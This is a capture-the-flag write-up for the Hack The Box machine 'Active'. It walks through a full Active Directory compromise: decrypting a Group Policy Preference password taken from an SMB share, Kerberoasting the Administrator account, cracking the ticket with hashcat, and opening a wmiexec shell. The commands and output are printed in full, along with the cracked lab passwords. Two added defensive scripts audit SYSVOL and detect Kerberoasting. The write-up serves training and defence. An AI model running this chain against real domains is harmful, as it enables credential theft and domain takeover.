HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:23 CEST
Nmap scan report for 10.10.10.100
Host is up (0.059s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-08-26 09:25:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49179/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/26%OT=53%CT=1%CU=31377%PV=Y%DS=2%DC=T%G=Y%TM=5F462B4
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M5
OS:4DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-08-26T09:26:31
|_  start_date: 2020-08-26T09:20:56

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   58.89 ms 10.10.14.1
2   58.93 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 301.32 seconds

Let’s enumerate SMB resources using SMBMap.

$ smbmap -H 10.10.10.100

[+] IP: 10.10.10.100:445	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

$ smbclient //10.10.10.100/Replication

Enter WORKGROUP\ruben's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

smb: \> dir
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4925568 blocks available

This share seems to be a copy of SYSVOL.

According to the information found in the following articles:

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

Attack Methods for Gaining Domain Admin Rights in Active Directory

we need to look for files such as Groups.xml, ScheduledTasks.xml and Services.xml, which are where Group Policy Preferences store account credentials.

Let’s download all the content to our machine to analyze it.

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0,7 KiloBytes/sec) (average 0,4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (5,7 KiloBytes/sec) (average 2,3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2,7 KiloBytes/sec) (average 2,4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (15,3 KiloBytes/sec) (average 4,9 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0,1 KiloBytes/sec) (average 4,1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (20,4 KiloBytes/sec) (average 6,4 KiloBytes/sec)

In those folders, we can find a file called Groups.xml
(/home/ruben/htb/active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups)

$ cat Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

This file contains a cpassword and a username.

userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

In order to decrypt a GPP (Group Policy Preference) password, we can use the tool gpp-decrypt. The cpassword value is AES-256 encrypted, but the key is static and was published by Microsoft in the MS-GPPREF specification, so anyone who can read the file can recover the plaintext.

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

So, the password is GPPstillStandingStrong2k18.
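As an added, defender-side example (not part of the original writeup), the script below audits a local copy of a SYSVOL Policies tree, such as the one downloaded from the Replication share above, and reports every Group Policy Preference file that still carries a cpassword attribute. The sample tree, GPO names, account names and the cpassword value are constructed for the demo.

```python
#!/usr/bin/env python3
"""Audit a downloaded SYSVOL Policies tree for Group Policy Preference files
that still carry a cpassword attribute (the weakness exploited in this box)."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files that can store a cpassword (the set covered by MS14-025).
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account differs per preference type; try them in order.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "name")


def find_cpasswords(root_dir):
    """Return one (relative path, account, cpassword length) tuple for every
    element under root_dir that still has a non-empty cpassword attribute."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue  # GPT.INI, Registry.pol, GptTmpl.inf etc. never hold cpassword
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # not well-formed XML: nothing to report, keep auditing
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if not cpw:
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
                findings.append((os.path.relpath(path, root_dir), account, len(cpw)))
    return findings


def build_sample_tree():
    """Constructed sample (not real data): one GPO with a leaked cpassword and one
    clean GPO, laid out like the Policies folder of the Replication share."""
    base = tempfile.mkdtemp(prefix="sysvol_audit_")
    leaky = os.path.join(base, "Policies", "{GPO-1}", "MACHINE", "Preferences", "Groups")
    clean = os.path.join(base, "Policies", "{GPO-2}", "MACHINE", "Preferences", "Groups")
    os.makedirs(leaky)
    os.makedirs(clean)
    with open(os.path.join(leaky, "Groups.xml"), "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?><Groups>'
                '<User name="example.local\\svc_backup">'
                '<Properties action="U" cpassword="CONSTRUCTED_CIPHERTEXT_NOT_REAL=="'
                ' userName="example.local\\svc_backup"/></User></Groups>')
    with open(os.path.join(clean, "Groups.xml"), "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?><Groups>'
                '<User name="example.local\\helpdesk">'
                '<Properties action="U" userName="example.local\\helpdesk"/></User></Groups>')
    return base


if __name__ == "__main__":
    for rel, account, length in find_cpasswords(build_sample_tree()):
        print(f"[!] {rel}: {account} has a {length}-char cpassword; delete it and rotate the password")
```

Point it at a real SYSVOL copy by replacing build_sample_tree() with the path you downloaded; every hit is a credential any domain user can read.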

$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb -H 10.10.10.100

[+] IP: 10.10.10.100:445	Name: active.htb                                        
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

$ smbclient //10.10.10.100/NETLOGON -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4925534 blocks available
smb: \> exit

$ smbclient //10.10.10.100/SYSVOL -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018
  active.htb                         Dr        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4925534 blocks available
smb: \> 

$ smbclient //10.10.10.100/Users -U SVC_TGS

Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4925534 blocks available

smb: \SVC_TGS\Desktop> get user.txt

getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>

$ cat user.txt

86d6XXXXXXXXXXXXXXXXXXXXXXXXXXXX

As described on this site, GetADUsers.py will gather data about the domain’s users and their corresponding email addresses. It will also include some extra information about the last logon and last password set attributes.

$ .local/bin/GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100

/home/ruben/.local/lib/python2.7/site-packages/cryptography/__init__.py:39: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  CryptographyDeprecationWarning,
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 21:06:40.351723  2018-07-30 19:17:40.656520 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 20:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 22:14:38.402764  2018-07-21 16:01:30.320277

As this site also describes,

Each Active Directory domain has an associated KRBTGT account that is used to encrypt and sign all Kerberos tickets for the domain.

More information about attacking Kerberos can be found on the following sites:

Detecting Kerberoasting Activity
How To Attack Kerberos 101
Kerberos (II): How to attack Kerberos?
Kerberoasting your way in

Kerberoasting

This box is vulnerable to Kerberoasting.

Kerberoasting is an attack technique for extracting service account credentials from AD.

A Kerberoasting attack involves requesting a service ticket from the Kerberos Ticket Granting Service (TGS).
Because the ticket is encrypted with the Windows NTLM password hash of the targeted user account (RC4, etype 23), the password can be cracked offline once the ticket is obtained.
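As an added detection-side example (not part of the original writeup), this flags likely Kerberoasting in Windows Security event 4769 records: successful service-ticket requests with RC4 encryption (TicketEncryptionType 0x17, the same etype 23 seen in the ticket and hashcat mode in this writeup) for user accounts rather than computer accounts. The log lines, client addresses and user names are constructed; a real deployment would read the events from the event log instead of a string.

```python
#!/usr/bin/env python3
"""Flag likely Kerberoasting from Windows Security event 4769 records.

Added detection example for this writeup; sample records are constructed
key=value lines, not real event log data."""
from collections import defaultdict

RC4_HMAC = "0x17"          # etype 23: the ticket type hashcat mode 13100 cracks
KNOWN_NOISE = {"krbtgt"}   # TGT renewals show up as TGS requests to krbtgt

# Constructed sample: in an AES-era domain, one user pulls an RC4 service ticket
# for a user-account SPN (in this box Administrator owns active/CIFS:445).
SAMPLE_4769 = """
EventID=4769 TargetUserName=alice@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.10.50
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.3
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.14.3
EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=WS01$ TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.10.51
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 Status=0x1f IpAddress=::ffff:10.10.14.3
"""


def parse_events(text):
    """Turn key=value lines into dicts, keeping only event 4769 records."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split())
        if fields.get("EventID") == "4769":
            events.append(fields)
    return events


def detect_kerberoast(events):
    """Return {requesting account: sorted service accounts} for successful RC4
    service-ticket requests against user (non-computer) accounts.

    Computer accounts end in '$' and legacy hosts still negotiate RC4 for them,
    so they are excluded; krbtgt is excluded because TGT renewals target it;
    any non-zero Status is a failed request and is ignored."""
    hits = defaultdict(set)
    for ev in events:
        svc = ev.get("ServiceName", "")
        if (ev.get("TicketEncryptionType") == RC4_HMAC
                and ev.get("Status") == "0x0"
                and not svc.endswith("$")
                and svc.lower() not in KNOWN_NOISE):
            hits[ev["TargetUserName"]].add(svc)
    return {user: sorted(svcs) for user, svcs in hits.items()}


if __name__ == "__main__":
    for user, services in detect_kerberoast(parse_events(SAMPLE_4769)).items():
        print(f"[!] {user} requested RC4 service tickets for user SPNs: {', '.join(services)}")
```

The lasting fix is to stop issuing RC4 tickets for these accounts at all (long random passwords or gMSA for service accounts, AES-only msDS-SupportedEncryptionTypes), after which any 0x17 ticket for a user SPN is an anomaly worth an alert.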

GetUserSPNs.py will find and fetch Service Principal Names that are associated with normal user accounts.

https://www.secureauth.com/labs/open-source-tools/impacket

$ .local/bin/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs

/home/ruben/.local/lib/python2.7/site-packages/cryptography/__init__.py:39: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  CryptographyDeprecationWarning,
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2018-07-30 19:17:40.656520             
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$f0bede1371c1e44a0837630832ef3fb4$8200d31fad7c4163c2e80f92bf0625d098df203f06dd31b40493758d176921b85cb326204b478f9309bdffb4054cfe7d97f69f77931b4394e1fea532556a5423009d856b0bacd1dcc1e2f21747943bebe86879881738953b405f982410e8b9fd0a95a298483a5e4ff0cb0b615a68b1194e004ba62d0a54eca9cc0accc2a414da8036bd82e6206409a215144fce07c3d6f3a5ccee6253ea2ba2090208883e852861b5d623a163ed116f4ef234686aacbf0cfb3e905a56fe8d33de56b7ec09dadb4eff38b07ac2ba8e67f2c89aaf12e1b27087aa69b94ef759aa2106b18c5828b0998e48693721689acd8d7c68806328c16b601c063b3411b52b78e1843be0319a639a1f28047668cc9edea00d1394b6aa0fd879113d175f197d21329e6642e10f2fbb8f93013b95e22c6f0183136fda6ccd67dafe70ddbb7df9e91ca88da47972339e154f155216f5bbab7af4a2e899bb7f53a1bfe85786565a03be5326755345dd24dd5eee3212151dbd942fffe405b78ffed760020eb059c01da4cb55724ada7fccb77c68d325c585c04ae75e227bc99b41fa2ce46d7e7718823f20fcfa4f47a25404e700ff0934f1787da858e25fcf0784f5a2f88f825c9c5373e2919575f134cd440d7e050ad21d993a3429147cb563d9485eba16e1f1ed7c607bf28e95aa0e1188cc5ae90a46f466f16d69c6327543deddf72e135168c34be9c924d3b300b872a50e7cfb0a5395b96ef7b3427d85e5ed0e18d5f0bb4cdfd13be870a3c43ab4e2c9416a87dad69fd5fb9031a023580ac968c2d6da1d2abb138e7ab081eeb07f15662962d145fefe5af26c2087645983692600b5d2c37bc40f397feca16052e2ea983a87c6885eafdd6f7aecbd401c26d2102b1816f484cf3f7534cbeb3f299bdbfaf7028fe266e2888b9412c469f183417795bd80b132ac8dc2f00a235bfcb2c63d71465ed4b2c6093252fab035dc0cf30f08242c5b6900d8d48f03e4b1bdbe6ff4a45335463a1da7f7a80c805d51a89a40771b2a0e1932e69655bf4ef34fb81e3cc11f1c53973b2882140dd7fec034b4a261948f77c9d9e28b619bdcb3cfb0640e1a745f227bd7de7416a3f690d03b3037d6f78257520bf9b89ccba8d2f6c32f847092ca6ca94df3e6ad582bdb87dcd1ee1317c1838d86e52b90b8039d7e109405f4ba97581f4165b9c958222b06c2facaca8da67f23ecf3cf0b83ba3b466ad3efebd5b14cf20bf89f0ee7f67d780a55442c42c4cfba1a24

To crack the password we will use hashcat.
It needs the hash mode that matches the format of the hash we obtained.
In our case, that is Kerberos 5 TGS-REP etype 23 (mode 13100).

A list of hash mode values can be found here.

$ sudo hashcat -m 13100 active.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4377/4441 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 99 MB


Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...7eeded
Time.Started.....: Wed Sep  2 12:45:06 2020 (14 secs)
Time.Estimated...: Wed Sep  2 12:45:30 2020 (10 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   579.4 kH/s (9.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 8249344/14344385 (57.51%)
Rejected.........: 0/8249344 (0.00%)
Restore.Point....: 8249344/14344385 (57.51%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ethan33101 -> estampillas

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$2659ce53d80906a8f105f9a4bf677695$[...]:Ticketmaster1968
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...7eeded
Time.Started.....: Wed Sep  2 12:45:06 2020 (18 secs)
Time.Estimated...: Wed Sep  2 12:45:24 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   578.0 kH/s (9.50ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Wed Sep  2 12:44:22 2020
Stopped: Wed Sep  2 12:45:26 2020

Password = Ticketmaster1968

Wmiexec.py can be used to get a shell as active\administrator and obtain the root flag.

Wmiexec.py provides a semi-interactive shell, executed through Windows Management Instrumentation.

https://www.secureauth.com/labs/open-source-tools/impacket

$ wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

C:\>whoami

active\administrator

C:\>dir

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 Volume in drive C has no label.
 Volume Serial Number is 2AF3-72E4

 Directory of C:\

14/07/2009  06:20 ��    <DIR>          PerfLogs
18/07/2018  09:44 ��    <DIR>          Program Files
18/07/2018  09:44 ��    <DIR>          Program Files (x86)
21/07/2018  05:39 ��    <DIR>          Users
02/09/2020  01:53 ��    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  20.175.851.520 bytes free

C:\Users\Administrator\Desktop>type root.txt

b5fcXXXXXXXXXXXXXXXXXXXXXXXXXXXX
